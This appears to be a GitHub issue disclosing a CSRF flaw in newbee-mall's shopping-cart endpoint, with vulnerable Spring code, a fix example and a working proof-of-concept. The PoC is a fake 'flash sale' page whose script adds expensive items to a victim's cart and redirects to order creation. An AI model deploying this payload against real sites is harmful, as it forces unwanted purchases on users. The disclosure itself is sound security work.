CSRF Vulnerability in Shopping Cart Item Addition #110

@flashzyc

Description

CSRF Vulnerability in Shopping Cart Item Addition

Summary

A CSRF vulnerability exists in the shopping cart addition endpoint /shop-cart (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    // Login interceptor bean (its concrete type is elided in this excerpt)
    @Autowired
    private HandlerInterceptor newBeeMallLoginInterceptor;

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // Only the login check guards /shop-cart/**; nothing ties a request to the originating site
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation configured
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 63-76)

@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                             HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Accepts JSON payload from any origin
    String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(saveResult);
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Accepts JSON requests sent with credentials: include, so the browser attaches the victim's session cookie
  3. ⚠️ Can be chained with the order creation CSRF for a full attack

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Special Offer - Limited Time!</title>
</head>
<body>
    <h1>🎁 Flash Sale! 90% OFF</h1>
    <p>Adding special offers to your cart...</p>
    
    <script>
        // Add expensive items to victim's shopping cart
        var itemsToAdd = [
            {goodsId: 10047, goodsCount: 5},   // Expensive item 1
            {goodsId: 10048, goodsCount: 10},  // Expensive item 2
            {goodsId: 10049, goodsCount: 3}    // Expensive item 3
        ];
        
        itemsToAdd.forEach(function(item) {
            fetch('http://localhost:28089/shop-cart', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(item)
            })
            .then(response => response.json())
            .then(data => console.log('Added item:', item.goodsId));
        });
        
        // Step 2: Redirect to order creation (chain attack)
        setTimeout(function() {
            window.location.href = 'http://localhost:28089/saveOrder';
        }, 2000);
    </script>
</body>
</html>
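A defensive counterpart, added here as an example and not code from newbee-mall: a Spring HandlerInterceptor that enforces a per-session synchronizer token (echoed in an X-CSRF-TOKEN header) and rejects foreign Origin headers, so a forged POST like the one in the PoC fails exactly the checks this issue reports as missing. The class name, header name and javax.servlet (Spring Boot 2.x) imports are assumptions; the allowed origin is taken from the PoC's target URL.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;
// Blocks cross-site state-changing requests with a per-session synchronizer token, plus an Origin check.
public class CsrfInterceptor implements HandlerInterceptor {
    // Assumed site origin, taken from the PoC's target URL; load it from configuration in practice.
    private static final String SITE_ORIGIN = "http://localhost:28089";
    private static final String TOKEN_ATTR = "CSRF_TOKEN";
    private static final SecureRandom RNG = new SecureRandom();
    @Override
    public boolean preHandle(HttpServletRequest req, HttpServletResponse resp, Object handler) throws Exception {
        String m = req.getMethod();
        if ("GET".equals(m) || "HEAD".equals(m) || "OPTIONS".equals(m)) {
            return true; // safe methods must not change state, so they need no token
        }
        // 1) Browsers attach Origin to cross-site POSTs; a foreign origin is rejected outright.
        String origin = req.getHeader("Origin");
        if (origin != null && !origin.equalsIgnoreCase(SITE_ORIGIN)) {
            resp.sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
            return false;
        }
        // 2) Synchronizer token: the cart page embeds tokenFor(session) and sends it back in
        //    X-CSRF-TOKEN; a page on another origin cannot read it, so a forged request lacks it.
        HttpSession session = req.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_ATTR);
        String actual = req.getHeader("X-CSRF-TOKEN");
        if (expected == null || actual == null || !MessageDigest.isEqual(
                expected.getBytes(StandardCharsets.UTF_8), actual.getBytes(StandardCharsets.UTF_8))) {
            resp.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }
    // Returns the session's token, minting a 256-bit random one on first use.
    public static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(TOKEN_ATTR);
        if (token == null) {
            byte[] raw = new byte[32];
            RNG.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.setAttribute(TOKEN_ATTR, token);
        }
        return token;
    }
}
```

Register it in NeeBeeMallWebMvcConfigurer.addInterceptors beside the login interceptor, e.g. registry.addInterceptor(new CsrfInterceptor()).addPathPatterns("/shop-cart/**", "/saveOrder"), and have the cart page embed CsrfInterceptor.tokenFor(session) and send it in the header. Note that the PoC's cross-origin fetch with Content-Type: application/json also triggers a CORS preflight, so it only succeeds where the server's CORS configuration answers that preflight permissively; the interceptor check above does not rely on CORS.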

Impact

Unauthorized shopping cart manipulation leading to forced purchases: when combined with the order creation CSRF, attackers can force users to buy unwanted expensive items.

CVSS Score: 7.6 (High)
